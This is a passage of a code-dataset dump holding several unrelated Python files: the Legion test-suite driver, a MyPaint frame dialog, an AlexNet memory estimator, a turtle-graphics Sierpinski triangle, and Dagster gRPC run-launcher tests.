%s' % test_fuzzer)\n print('### * Realm: %s' % test_realm)\n print('### * External1: %s' % test_external1)\n print('### * External2: %s' % test_external2)\n print('### * Private: %s' % test_private)\n print('### * Perf: %s' % test_perf)\n print('### * CTest: %s' % test_ctest)\n print('### * Jupyter: %s' % test_jupyter)\n print('###')\n print('### Build Flags:')\n print('### * Networks: %s' % networks)\n print('### * CUDA: %s' % use_cuda)\n print('### * HIP: %s' % use_hip)\n print('### * OpenMP: %s' % use_openmp)\n print('### * Kokkos: %s' % use_kokkos)\n print('### * Python: %s' % use_python)\n print('### * LLVM: %s' % use_llvm)\n print('### * HDF5: %s' % use_hdf)\n print('### * Fortran: %s' % use_fortran)\n print('### * Spy: %s' % use_spy)\n print('### * Prof: %s' % use_prof)\n print('### * Bounds: %s' % use_bounds_checks)\n print('### * Privilege: %s' % use_privilege_checks)\n print('### * Cplx Redop: %s' % use_complex)\n print('### * Shared Obj: %s' % use_shared_objects)\n print('### * Gcov: %s' % use_gcov)\n print('### * CMake: %s' % use_cmake)\n print('### * RDIR: %s' % use_rdir)\n print('### * NVTX: %s' % use_nvtx)\n print('### * LIBDW: %s' % use_libdw)\n print('### * Max DIM: %s' % max_dim)\n print('### * CXX STD: %s' % cxx_standard)\n print('#'*60)\n print()\n sys.stdout.flush()\n\ndef run_tests(test_modules=None,\n debug=True,\n max_dim=3,\n use_features=None,\n networks='',\n launcher=None,\n thread_count=None,\n root_dir=None,\n tmp_dir=None,\n check_ownership=False,\n keep_tmp_dir=False,\n timelimit=None,\n verbose=False):\n if thread_count is None:\n try:\n # this correctly considers the current affinity mask\n thread_count = len(os.sched_getaffinity(0))\n except AttributeError:\n # this works on macos\n thread_count = multiprocessing.cpu_count()\n\n if root_dir is None:\n root_dir = os.path.dirname(os.path.realpath(__file__))\n\n if timelimit is None:\n if 'TIMELIMIT' in os.environ:\n timelimit = int(os.environ['TIMELIMIT'])\n\n # Determine which test modules to run.\n def module_enabled(module, default=True, prefix='TEST_', **kwargs):\n return option_enabled(module, test_modules, default,\n envprefix=prefix, **kwargs)\n test_regent = module_enabled('regent')\n test_legion_cxx = module_enabled('legion_cxx')\n test_fuzzer = module_enabled('fuzzer', False)\n test_realm = module_enabled('realm', not debug)\n test_external1 = module_enabled('external1', False)\n test_external2 = module_enabled('external2', False)\n test_private = module_enabled('private', False)\n test_perf = module_enabled('perf', False)\n test_ctest = module_enabled('ctest', False)\n test_jupyter = module_enabled('jupyter', False)\n\n # Determine which features to build with.\n def feature_enabled(feature, default=True, prefix='USE_', **kwargs):\n return option_enabled(feature, use_features, default,\n envprefix=prefix, **kwargs)\n use_cuda = feature_enabled('cuda', False)\n use_hip = feature_enabled('hip', False)\n use_openmp = feature_enabled('openmp', False)\n use_kokkos = feature_enabled('kokkos', False)\n use_python = feature_enabled('python', False)\n use_llvm = feature_enabled('llvm', False)\n use_hdf = feature_enabled('hdf', False)\n use_fortran = feature_enabled('fortran', False, prefix='LEGION_USE_')\n use_spy = feature_enabled('spy', False)\n use_prof = feature_enabled('prof', False)\n use_bounds_checks = feature_enabled('bounds', False,\n envname='BOUNDS_CHECKS')\n use_privilege_checks = feature_enabled('privilege', False,\n envname='PRIVILEGE_CHECKS')\n use_complex = feature_enabled('complex', True)\n use_gcov = feature_enabled('gcov', False)\n use_cmake = feature_enabled('cmake', False)\n use_rdir = feature_enabled('rdir', True)\n use_nvtx = feature_enabled('nvtx', False)\n use_libdw = feature_enabled('libdw', False, prefix='REALM_BACKTRACE_USE_')\n use_shared_objects = feature_enabled('shared', False,\n envname='SHARED_OBJECTS')\n\n if use_kokkos and not use_cmake:\n raise Exception('Kokkos support requires use of CMake')\n\n # Determine parameters for performance tests.\n if test_perf:\n if 'PERF_MIN_NODES' not in os.environ:\n raise Exception('Performance tests requested but PERF_MIN_NODES is not set')\n min_nodes = int(os.environ['PERF_MIN_NODES'])\n if 'PERF_MAX_NODES' not in os.environ:\n raise Exception('Performance tests requested but PERF_MAX_NODES is not set')\n max_nodes = int(os.environ['PERF_MAX_NODES'])\n\n if test_perf and debug:\n raise Exception('Performance tests requested but DEBUG is enabled')\n\n if test_ctest and not use_cmake:\n raise Exception('CTest cannot be used without CMake')\n\n if test_jupyter and not use_python:\n raise Exception('Jupyter requires Python')\n\n if networks and launcher is None:\n raise Exception('Network(s) is enabled but launcher is not set (use --launcher or LAUNCHER)')\n launcher = launcher.split() if launcher is not None else []\n\n # CXX Standard\n cxx_standard = os.environ['CXX_STANDARD'] if 'CXX_STANDARD' in os.environ else ''\n # if not use cmake, let's add -std=c++NN to CXXFLAGS\n if use_cmake == False:\n if cxx_standard != '':\n if 'CXX_STANDARD' in os.environ:\n os.environ['CXXFLAGS'] += \" -std=c++\" + os.environ['CXX_STANDARD']\n else:\n os.environ['CXXFLAGS'] = \" -std=c++\" + os.environ['CXX_STANDARD']\n\n gcov_flags = ' -ftest-coverage -fprofile-arcs'\n\n if check_ownership:\n check_test_legion_cxx(root_dir)\n return\n\n report_mode(debug, max_dim, launcher,\n test_regent, test_legion_cxx, test_fuzzer, test_realm,\n test_external1, test_external2, test_private,\n test_perf, test_ctest, test_jupyter,\n networks,\n use_cuda, use_hip, use_openmp, use_kokkos, use_python, use_llvm,\n use_hdf, use_fortran, use_spy, use_prof,\n use_bounds_checks, use_privilege_checks, use_complex,\n use_shared_objects,\n use_gcov, use_cmake, use_rdir, use_nvtx, use_libdw, cxx_standard)\n\n if not tmp_dir:\n tmp_dir = tempfile.mkdtemp(dir=root_dir)\n else:\n if os.path.exists(tmp_dir):\n shutil.rmtree(tmp_dir)\n os.mkdir(tmp_dir)\n\n if verbose:\n print('Using build directory: %s' % tmp_dir)\n print()\n\n # Normalize the test environment.\n env = dict(list(os.environ.items()) + [\n ('DEBUG', '1' if debug else '0'),\n ('LAUNCHER', ' '.join(launcher)),\n ('REALM_NETWORKS', networks),\n ('USE_CUDA', '1' if use_cuda else '0'),\n ('TEST_CUDA', '1' if use_cuda else '0'),\n ('USE_HIP', '1' if use_hip else '0'),\n ('TEST_HIP', '1' if use_hip else '0'),\n ('USE_OPENMP', '1' if use_openmp else '0'),\n ('TEST_OPENMP', '1' if use_openmp else '0'),\n ('USE_KOKKOS', '1' if use_kokkos else '0'),\n ('TEST_KOKKOS', '1' if use_kokkos else '0'),\n ('USE_PYTHON', '1' if use_python else '0'),\n ('TEST_PYTHON', '1' if use_python else '0'),\n ('USE_LLVM', '1' if use_llvm else '0'),\n ('USE_HDF', '1' if use_hdf else '0'),\n ('TEST_HDF', '1' if use_hdf else '0'),\n ('LEGION_USE_FORTRAN', '1' if use_fortran else '0'),\n ('TEST_FORTRAN', '1' if use_fortran else '0'),\n ('USE_SPY', '1' if use_spy else '0'),\n ('TEST_SPY', '1' if use_spy else '0'),\n ('USE_PROF', '1' if use_prof else '0'),\n ('TEST_PROF', '1' if use_prof else '0'),\n ('BOUNDS_CHECKS', '1' if use_bounds_checks else '0'),\n ('PRIVILEGE_CHECKS', '1' if use_privilege_checks else '0'),\n ('USE_COMPLEX', '1' if use_complex else '0'),\n ('SHARED_OBJECTS', '1' if use_shared_objects else '0'),\n ('TEST_GCOV', '1' if use_gcov else '0'),\n ('USE_RDIR', '1' if use_rdir else '0'),\n ('USE_NVTX', '1' if use_nvtx else '0'),\n ('REALM_BACKTRACE_USE_LIBDW', '1' if use_libdw else '0'),\n ('MAX_DIM', str(max_dim)),\n ('LG_RT_DIR', os.path.join(root_dir, 'runtime')),\n ('DEFINE_HEADERS_DIR', os.path.join(root_dir, 'runtime')),\n ('CMAKE_BUILD_DIR', os.path.join(tmp_dir, 'build')),\n ('TMP_BIN_DIR', os.path.join(tmp_dir, 'bin'))] + (\n\n # Gcov doesn't get a USE_GCOV flag, but instead stuff the GCC\n # options for Gcov on to the compile and link flags.\n [('CXXFLAGS', (os.environ['CXXFLAGS'] + gcov_flags\n if 'CXXFLAGS' in os.environ else gcov_flags)),\n ('LDFLAGS', (os.environ['LDFLAGS'] + gcov_flags\n if 'LDFLAGS' in os.environ else gcov_flags)),\n ] if use_gcov else []))\n\n try:\n # Build tests.\n with Stage('build'):\n if use_prof or use_spy:\n build_legion_prof_rs(root_dir, tmp_dir, env)\n if use_prof:\n run_test_legion_prof_mypy(root_dir)\n if use_cmake:\n # We should always be using ctest if we're building with\n # cmake, except for some unusual cases with Regent\n # (ask @eslaught for details about Regent cases)\n assert test_ctest or test_regent\n bin_dir = build_cmake(\n root_dir, tmp_dir, env, thread_count,\n test_regent, test_legion_cxx, test_external1,\n test_external2,\n test_perf, test_ctest)\n else:\n # With GNU Make, builds happen inline. But clean here.\n build_make_clean(\n root_dir, env, thread_count, test_legion_cxx, test_perf,\n # These configurations also need to be cleaned first.\n test_external1, test_external2, test_private)\n bin_dir = None\n\n # Run tests.\n if test_regent:\n with Stage('regent'):\n run_test_regent(launcher, root_dir, tmp_dir, bin_dir, env, thread_count)\n if test_legion_cxx:\n with Stage('legion_cxx'):\n run_test_legion_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_prof:\n run_test_legion_prof_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if networks:\n run_test_legion_network_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_openmp:\n run_test_legion_openmp_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_kokkos:\n run_test_legion_kokkos_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_python:\n run_test_legion_python_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_hdf:\n run_test_legion_hdf_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_fortran:\n run_test_legion_fortran(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_fuzzer:\n with Stage('fuzzer'):\n run_test_fuzzer(launcher, root_dir, tmp_dir, bin_dir, env, thread_count)\n if test_realm and not test_ctest:\n with Stage('realm'):\n run_test_realm(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_external1:\n with Stage('external1'):\n if not test_regent:\n build_regent(root_dir, env)\n run_test_external1(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_external2:\n with Stage('external2'):\n if not test_regent:\n build_regent(root_dir, env)\n run_test_external2(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_private:\n with Stage('private'):\n run_test_private(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_perf:\n with Stage('perf'):\n run_test_perf(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, min_nodes, max_nodes, timelimit)\n if test_ctest:\n with Stage('ctest'):\n run_test_ctest(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_jupyter:\n with Stage('jupyter'):\n run_test_legion_jupyter_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n finally:\n if keep_tmp_dir:\n print('Leaving build directory:')\n print(' %s' % tmp_dir)\n else:\n if verbose:\n print('Removing build directory:')\n print(' %s' % tmp_dir)\n shutil.rmtree(tmp_dir)\n\n# behaves enough like a normal list for ArgumentParser's needs, except for\n# the __contains__ method, which accepts a list of values and checks each\n# one for membership\nclass MultipleChoiceList(object):\n def __init__(self, *args):\n self.list = list(args)\n\n def __contains__(self, x):\n if type(x) is list:\n for v in x:\n if v not in self.list:\n return False\n return True\n else:\n return x in self.list\n\n def __iter__(self):\n return self.list.__iter__()\n\nclass ExtendAction(argparse.Action):\n def __init__(self, **kwargs):\n super(ExtendAction, self).__init__(**kwargs)\n\n def __call__(self, parser, namespace, values, option_string=None):\n items = getattr(namespace, self.dest, None)\n items = items[:] if items else []\n if type(values) is list:\n items.extend(values)\n else:\n items.append(values)\n setattr(namespace, self.dest, items)\n\ndef driver():\n parser = argparse.ArgumentParser(\n description = 'Legion test suite')\n\n # What tests to run:\n parser.add_argument(\n '--test', dest='test_modules', action=ExtendAction,\n choices=MultipleChoiceList('regent', 'legion_cxx', 'fuzzer',\n 'realm', 'external1', 'external2',\n 'private', 'perf', 'ctest', 'jupyter'),\n type=lambda s: s.split(','),\n default=None,\n help='Test modules to run (also via TEST_*).')\n\n # Build options:\n parser.add_argument(\n '--debug', dest='debug', action='store_true',\n default=os.environ['DEBUG'] == '1' if 'DEBUG' in os.environ else True,\n help='Build Legion in debug mode (also via DEBUG).')\n parser.add_argument(\n '--no-debug', dest='debug', action='store_false',\n help='Disable debug mode (equivalent to DEBUG=0).')\n parser.add_argument(\n '--max-dim', dest='max_dim', type=int,\n default=int(os.environ['MAX_DIM']) if 'MAX_DIM' in os.environ else 3,\n help='Maximum number of dimensions (also via MAX_DIM).')\n parser.add_argument(\n '--use', dest='use_features', action=ExtendAction,\n choices=MultipleChoiceList('gasnet', 'cuda', 'hip', 'openmp', 'kokkos',\n 'python', 'llvm', 'hdf', 'fortran', 'spy', 'prof',\n 'bounds', 'privilege', 'complex',\n 'gcov', 'cmake', 'rdir', 'nvtx'),\n type=lambda s: s.split(','),\n default=None,\n help='Build Legion with features (also via USE_*).')\n parser.add_argument(\n '--network', dest='networks', action='store',\n default=os.environ.get('REALM_NETWORKS', 'gasnet1' if os.environ.get('USE_GASNET', '0') == '1' else ''),\n help='Network backend(s) to build with')\n parser.add_argument(\n '--launcher', dest='launcher', action='store',\n default=os.environ['LAUNCHER'] if 'LAUNCHER' in os.environ else None,\n help='Launcher for Legion tests (also via LAUNCHER).')\n\n parser.add_argument(\n '-C', '--directory', dest='root_dir', metavar='DIR', action='store', required=False,\n help='Legion root directory.')\n\n parser.add_argument(\n '--tmp-dir', dest='tmp_dir', metavar='DIR', action='store', required=False,\n help='Temporary directory path for out-of-source builds')\n\n parser.add_argument(\n '-j', dest='thread_count', nargs='?', type=int,\n help='Number threads used to compile.')\n\n parser.add_argument(\n '--check', dest='check_ownership', action='store_true',\n help='Check for tests that are being skipped.')\n\n parser.add_argument(\n '--keep', dest='keep_tmp_dir', action='store_true',\n help='Keep temporary directory.')\n\n parser.add_argument(\n '--timelimit', dest='timelimit', type=int,\n help='Maximum time (in seconds) allowed for individual test execution')\n\n parser.add_argument(\n '-v', '--verbose', dest='verbose', action='store_true',\n help='Print more debugging information.')\n\n args = parser.parse_args()\n\n run_tests(**vars(args))\n\nif __name__ == '__main__':\n driver()\n","repo_name":"StanfordLegion/legion","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":62385,"program_lang":"python","lang":"en","doc_type":"code","stars":616,"dataset":"github-code","pt":"31"} +{"seq_id":"39415403127","text":"\nimport gtk\n\nfrom gettext import gettext as _\n\nimport windowing\nfrom lib import tiledsurface # For the tile size\n\nclass Window(windowing.Dialog):\n def __init__(self, app):\n buttons = (gtk.STOCK_OK, gtk.RESPONSE_ACCEPT)\n windowing.Dialog.__init__(self, app, (\"Frame\"), app.drawWindow, buttons=buttons)\n\n self.callbacks_active = False\n\n x, y, w, h = self.app.doc.model.get_frame()\n\n # FIXME: don't limit frame to multiples of N\n # Requires PNG saving to support saving of partial tiles\n # See lib/pixbufsurface.py save_as_png()\n tile_size = tiledsurface.N\n max_size = tile_size*500\n self.width_adj = gtk.Adjustment(w, upper=max_size, step_incr=tile_size, page_incr=tile_size*4)\n self.height_adj = gtk.Adjustment(h, upper=max_size, step_incr=tile_size, page_incr=tile_size*4)\n\n self.width_adj.connect('value-changed', self.on_size_adjustment_changed)\n self.height_adj.connect('value-changed', self.on_size_adjustment_changed)\n\n self.app.doc.model.frame_observers.append(self.on_frame_changed)\n\n self._init_ui()\n\n def _init_ui(self):\n height_label = gtk.Label(_('Height'))\n width_label = gtk.Label(_('Width'))\n\n height_entry = gtk.SpinButton(self.height_adj)\n width_entry = gtk.SpinButton(self.width_adj)\n\n size_table = gtk.Table(2, 2)\n size_table.attach(width_label, 0, 1, 0, 1)\n size_table.attach(height_label, 0, 1, 1, 2)\n size_table.attach(width_entry, 1, 2, 0, 1)\n size_table.attach(height_entry, 1, 2, 1, 2)\n\n crop_layer_button = gtk.Button(_('Crop to active layer bounds'))\n crop_document_button = gtk.Button(_('Crop to document bounds'))\n crop_layer_button.connect('clicked', self.crop_frame_cb, 'CropFrameToLayer')\n crop_document_button.connect('clicked', self.crop_frame_cb, 'CropFrameToDocument')\n\n self.enable_button = gtk.CheckButton(_('Enabled'))\n self.enable_button.connect('toggled', self.on_frame_toggled)\n enabled = self.app.doc.model.frame_enabled\n self.enable_button.set_active(enabled)\n\n top_vbox = self.get_content_area()\n top_vbox.pack_start(size_table)\n top_vbox.pack_start(crop_layer_button)\n top_vbox.pack_start(crop_document_button)\n top_vbox.pack_start(self.enable_button)\n\n self.connect('response', self.on_response)\n\n def on_response(self, dialog, response_id):\n if response_id == gtk.RESPONSE_ACCEPT:\n self.hide()\n\n # FRAME\n def crop_frame_cb(self, button, command):\n if command == 'CropFrameToLayer':\n bbox = self.app.doc.model.get_current_layer().surface.get_bbox()\n elif command == 'CropFrameToDocument':\n bbox = self.app.doc.model.get_bbox()\n else: assert 0\n self.app.doc.model.set_frame(*bbox)\n\n def on_frame_toggled(self, button):\n \"\"\"Update the frame state in the model.\"\"\"\n if self.callbacks_active:\n return\n\n self.app.doc.model.set_frame_enabled(button.get_active())\n\n def on_size_adjustment_changed(self, adjustment):\n \"\"\"Update the frame size in the model.\"\"\"\n if self.callbacks_active:\n return\n\n width = int(self.width_adj.get_value())\n height = int(self.height_adj.get_value())\n\n N = tiledsurface.N\n rwidth = N * (abs(width) // N)\n rheight = N * (abs(height) // N)\n if width != rwidth:\n width = rwidth\n self.width_adj.set_value(width)\n if height != rheight:\n height = rheight\n self.height_adj.set_value(height)\n self.app.doc.model.set_frame(width=width, height=height)\n\n def on_frame_changed(self):\n \"\"\"Update the UI to reflect the model.\"\"\"\n self.callbacks_active = True # Prevent callback loops\n\n x, y, w, h = self.app.doc.model.get_frame()\n self.width_adj.set_value(w)\n self.height_adj.set_value(h)\n enabled = self.app.doc.model.frame_enabled\n self.enable_button.set_active(enabled)\n\n self.callbacks_active = False\n","repo_name":"benosteen/mypaint","sub_path":"gui/framewindow.py","file_name":"framewindow.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"24710520988","text":"# Define a model\nimport torch\nimport torch.nn as nn\nfrom torchbenchmark.network.core import AlexNet\n\nimport click\n\n\nclass Model(nn.Module):\n\n def __init__(self):\n super(Model,self).__init__()\n\n self.conv0 = nn.Conv2d(1, 16, kernel_size=3, padding=5)\n self.conv1 = nn.Conv2d(16, 32, kernel_size=3)\n\n def forward(self, x):\n h = self.conv0(x)\n h = self.conv1(h)\n return h\n\nnum_classes = 1000\nmodel_alexnet = AlexNet(num_classes=num_classes)\nmodel = Model()\n\nmodules = list(model.modules())\n\nbatch_size = 1\nimage_w = 227\nimage_h = 227\n\nfrom torchbenchmark.estimator.sequential_model_estimator import ModuleStats\n\ninput_ = torch.randn(batch_size, 3, image_w, image_h)\n\nms = ModuleStats(model=model_alexnet, input=input_)\n\nparams = ms.get_params()\nprint(\"Params\")\nprint(params)\n\noutput_sizes = ms.get_activations()\nprint(\"Output Sizes\")\nprint(output_sizes)\n\nparam_bits = ms.get_param_bits()\nprint(\"Param Bits\")\nprint(param_bits)\n\nmegabytes = 8.0 * 1024 * 1024\n\nparam_memory_mb = ms.get_param_bits() / megabytes\ninput_memory_mb = ms.get_input_bits() / megabytes\nforward_memory_mb = ms.get_forward_bits() / megabytes\nbackward_memory_mb = ms.get_backward_bits() / megabytes\n\nprint(\"Param Memory MB : {}\".format(param_memory_mb))\nprint(\"Input Memory MB : {}\".format(input_memory_mb))\nprint(\"Forward Memory MB : {}\".format(forward_memory_mb))\nprint(\"Backward Memory MB : {}\".format(backward_memory_mb))\n\nprint(\"Total Memory MB : {}\".format(ms.get_total_memory_mb()))\n\nbits_vs_module = ms.get_param_bits_per_module()\n\nprint(bits_vs_module)\nprint(sum(bits_vs_module)/8/(1024**2))\n\nwidth, _ = click.get_terminal_size()\nclick.echo('-' * width)\nms.get_memory_profile()\nclick.echo('-' * width)\n\n# from fabulous.color import bold, magenta, highlight_green\n#\n# print(bold(magenta('hello world')))\n#\n# print(highlight_green('DANGER WILL ROBINSON!'))\n#\n# print(bold('hello') + ' ' + magenta(' world'))\n#\n# assert len(bold('test')) == 4\n\n\nms.get_memory_profile()","repo_name":"vibhatha/torchbenchmark","sub_path":"torchbenchmark/estimator_benchmark/alexnet_estimator.py","file_name":"alexnet_estimator.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18460924690","text":"import turtle\r\nimport time\r\n\r\n#goto()\r\n# x - un número o un par/vector de números\r\n# y - un número o ninguno (None)\r\n# Si y es None, x debe ser un par de coordenadas o un Vec2D (por ejemplo, como lo devuelve pos ()).\r\n# Mueva la tortuga a una posición absoluta\r\n\r\n\r\ndef dibujarTriangulo(puntos,t):\r\n t.up() #Levante el bolígrafo, no dibuje al moverlo.\r\n t.goto(puntos[0][0],puntos[0][1]) #goto(-100,-50) \r\n t.down()\r\n t.goto(puntos[1][0],puntos[1][1]) #goto(0,100) \r\n t.goto(puntos[2][0],puntos[2][1]) #goto(100,-50)\r\n t.goto(puntos[0][0],puntos[0][1]) #goto(-100,0)\r\n\r\ndef triangulo(puntos,color,t):\r\n t.fillcolor(color)\r\n t.up() \r\n t.goto(puntos[0]) #goto(0,100) \r\n t.down()\r\n t.begin_fill()\r\n t.goto(puntos[1]) #goto(100,-50)\r\n time.sleep(4)\r\n t.goto(puntos[2]) #goto(-100,0)\t\r\n time.sleep(4)\r\n t.goto(puntos[0])\r\n t.end_fill()\r\n\r\n\r\ndef mitad(p1,p2): #recibe dos array c/u con dos valores, en otras palabras recibe dos coordenadas [x,y]\r\n\treturn (p1[0]+p2[0])/2, (p1[1]+p2[1])/2 #promedio de x y promedio de y\r\n\r\n\r\n#hacer seguimiento en grado 2\r\ndef sierpinski(p,grado,miTortuga):\r\n\t#dibujarTriangulo(puntos,miTortuga) #dibujara un triangulo en base a el multiarray de 3 coordenadas\r\n\tcolores = ['yellow','orange','red']\r\n\ttriangulo(p,colores[grado],miTortuga)\r\n\ttime.sleep(3)\r\n\tif grado > 0:\r\n\t\t#1ra llamada: \r\n\t sierpinski([p[0], #[-100,-50]\r\n\t mitad(p[0], p[1]), #mitad([-100,-50],[0,100])\r\n\t mitad(p[0], p[2])], #mitad([-100,-50],[100,-50])\r\n\t grado-1, miTortuga)\r\n\t time.sleep(3)\r\n\t sierpinski([p[1],\r\n\t mitad(p[0], p[1]), #mitad([],[])\r\n\t mitad(p[1], p[2])], #mitad([],[])\r\n\t grado-1, miTortuga)\r\n\t time.sleep(3)\r\n\t sierpinski([p[2],\r\n\t mitad(p[2], p[1]), #mitad([],[])\r\n\t mitad(p[0], p[2])], #mitad([],[])\r\n\t grado-1, miTortuga)\r\ndef main():\r\n t = turtle.Turtle()\r\n miVentana = turtle.Screen()\r\n t.speed(1)\r\n puntos = [[-100,-50],[0,100],[100,-50]]\r\n #puntos = [[-300,-150],[0,300],[300,-150]]\r\n sierpinski(puntos,2,t)\r\n #triangulador(puntos,t)\r\n miVentana.exitonclick()\r\n\r\n\r\nmain()","repo_name":"curiosubermensch/EstructuraDeDatos","sub_path":"sierpinski.py","file_name":"sierpinski.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38544773866","text":"import time\n\nimport pytest\nfrom dagster import file_relative_path, seven\nfrom dagster.core.definitions.reconstructable import ReconstructableRepository\nfrom dagster.core.errors import DagsterLaunchFailedError\nfrom dagster.core.host_representation.handle import RepositoryLocationHandle\nfrom dagster.core.host_representation.repository_location import GrpcServerRepositoryLocation\nfrom dagster.core.instance import DagsterInstance\nfrom dagster.core.storage.pipeline_run import PipelineRunStatus\nfrom dagster.core.storage.tags import GRPC_INFO_TAG\nfrom dagster.core.test_utils import instance_for_test, poll_for_finished_run, poll_for_step_start\nfrom dagster.core.types.loadable_target_origin import LoadableTargetOrigin\nfrom dagster.grpc.server import GrpcServerProcess\nfrom dagster.utils import find_free_port, merge_dicts\nfrom dagster_tests.core_tests.launcher_tests.test_default_run_launcher import (\n math_diamond,\n sleepy_pipeline,\n slow_pipeline,\n)\n\n\ndef grpc_instance():\n return instance_for_test(\n overrides={\n \"run_launcher\": {\n \"module\": \"dagster.core.launcher.grpc_run_launcher\",\n \"class\": \"GrpcRunLauncher\",\n }\n },\n )\n\n\ndef test_run_always_finishes(): # pylint: disable=redefined-outer-name\n with seven.TemporaryDirectory() as temp_dir:\n instance = DagsterInstance.local_temp(\n temp_dir,\n overrides={\n \"run_launcher\": {\n \"module\": \"dagster.core.launcher.grpc_run_launcher\",\n \"class\": \"GrpcRunLauncher\",\n }\n },\n )\n\n pipeline_run = instance.create_run_for_pipeline(pipeline_def=slow_pipeline, run_config=None)\n run_id = pipeline_run.run_id\n\n loadable_target_origin = LoadableTargetOrigin(\n attribute=\"nope\",\n python_file=file_relative_path(__file__, \"test_default_run_launcher.py\"),\n )\n server_process = GrpcServerProcess(\n loadable_target_origin=loadable_target_origin, max_workers=4\n )\n with server_process.create_ephemeral_client() as api_client:\n repository_location = GrpcServerRepositoryLocation(\n RepositoryLocationHandle.create_grpc_server_location(\n location_name=\"test\",\n port=api_client.port,\n socket=api_client.socket,\n host=api_client.host,\n )\n )\n\n external_pipeline = repository_location.get_repository(\n \"nope\"\n ).get_full_external_pipeline(\"slow_pipeline\")\n\n assert instance.get_run_by_id(run_id).status == PipelineRunStatus.NOT_STARTED\n\n launcher = instance.run_launcher\n launcher.launch_run(\n instance=instance, run=pipeline_run, external_pipeline=external_pipeline\n )\n\n # Server process now receives shutdown event, run has not finished yet\n pipeline_run = instance.get_run_by_id(run_id)\n assert not pipeline_run.is_finished\n assert server_process.server_process.poll() is None\n\n # Server should wait until run finishes, then shutdown\n pipeline_run = poll_for_finished_run(instance, run_id)\n assert pipeline_run.status == PipelineRunStatus.SUCCESS\n\n start_time = time.time()\n while server_process.server_process.poll() is None:\n time.sleep(0.05)\n # Verify server process cleans up eventually\n assert time.time() - start_time < 5\n\n server_process.wait()\n\n\ndef test_terminate_after_shutdown():\n with grpc_instance() as instance:\n repository_location_handle = RepositoryLocationHandle.create_process_bound_grpc_server_location(\n loadable_target_origin=LoadableTargetOrigin(\n attribute=\"nope\",\n python_file=file_relative_path(__file__, \"test_default_run_launcher.py\"),\n ),\n location_name=\"nope\",\n )\n repository_location = GrpcServerRepositoryLocation(repository_location_handle)\n\n external_pipeline = repository_location.get_repository(\"nope\").get_full_external_pipeline(\n \"sleepy_pipeline\"\n )\n\n pipeline_run = instance.create_run_for_pipeline(\n pipeline_def=sleepy_pipeline, run_config=None\n )\n\n launcher = instance.run_launcher\n launcher.launch_run(instance, pipeline_run, external_pipeline)\n\n poll_for_step_start(instance, pipeline_run.run_id)\n\n # Tell the server to shut down once executions finish\n repository_location_handle.client.cleanup_server()\n\n # Trying to start another run fails\n doomed_to_fail_external_pipeline = repository_location.get_repository(\n \"nope\"\n ).get_full_external_pipeline(\"math_diamond\")\n doomed_to_fail_pipeline_run = instance.create_run_for_pipeline(\n pipeline_def=math_diamond, run_config=None\n )\n\n with pytest.raises(DagsterLaunchFailedError):\n launcher.launch_run(\n instance, doomed_to_fail_pipeline_run, doomed_to_fail_external_pipeline\n )\n\n # Can terminate the run even after the shutdown event has been received\n assert launcher.can_terminate(pipeline_run.run_id)\n assert launcher.terminate(pipeline_run.run_id)\n\n # Server process now shuts down cleanly since there are no more executions\n\n\ndef test_server_down():\n with grpc_instance() as instance:\n loadable_target_origin = LoadableTargetOrigin(\n attribute=\"nope\",\n python_file=file_relative_path(__file__, \"test_default_run_launcher.py\"),\n )\n\n server_process = GrpcServerProcess(\n loadable_target_origin=loadable_target_origin, max_workers=4, force_port=True\n )\n\n with server_process.create_ephemeral_client() as api_client:\n repository_location = GrpcServerRepositoryLocation(\n RepositoryLocationHandle.create_grpc_server_location(\n location_name=\"test\",\n port=api_client.port,\n socket=api_client.socket,\n host=api_client.host,\n )\n )\n\n external_pipeline = repository_location.get_repository(\n \"nope\"\n ).get_full_external_pipeline(\"sleepy_pipeline\")\n\n pipeline_run = instance.create_run_for_pipeline(\n pipeline_def=sleepy_pipeline, run_config=None\n )\n\n launcher = instance.run_launcher\n\n launcher.launch_run(instance, pipeline_run, external_pipeline)\n\n poll_for_step_start(instance, pipeline_run.run_id)\n\n assert launcher.can_terminate(pipeline_run.run_id)\n\n original_run_tags = instance.get_run_by_id(pipeline_run.run_id).tags[GRPC_INFO_TAG]\n\n # Replace run tags with an invalid port\n instance.add_run_tags(\n pipeline_run.run_id,\n {\n GRPC_INFO_TAG: seven.json.dumps(\n merge_dicts({\"host\": \"localhost\"}, {\"port\": find_free_port()})\n )\n },\n )\n\n assert not launcher.can_terminate(pipeline_run.run_id)\n\n instance.add_run_tags(\n pipeline_run.run_id, {GRPC_INFO_TAG: original_run_tags,},\n )\n\n assert launcher.terminate(pipeline_run.run_id)\n\n server_process.wait()\n","repo_name":"G9999/dagster","sub_path":"python_modules/dagster/dagster_tests/core_tests/launcher_tests/test_persistent_grpc_run_launcher.py","file_name":"test_persistent_grpc_run_launcher.py","file_ext":"py","file_size_in_byte":7518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"23985528327","text":"'''\nExercise 2 \n \nAuthors:\n Toyberman Maxim 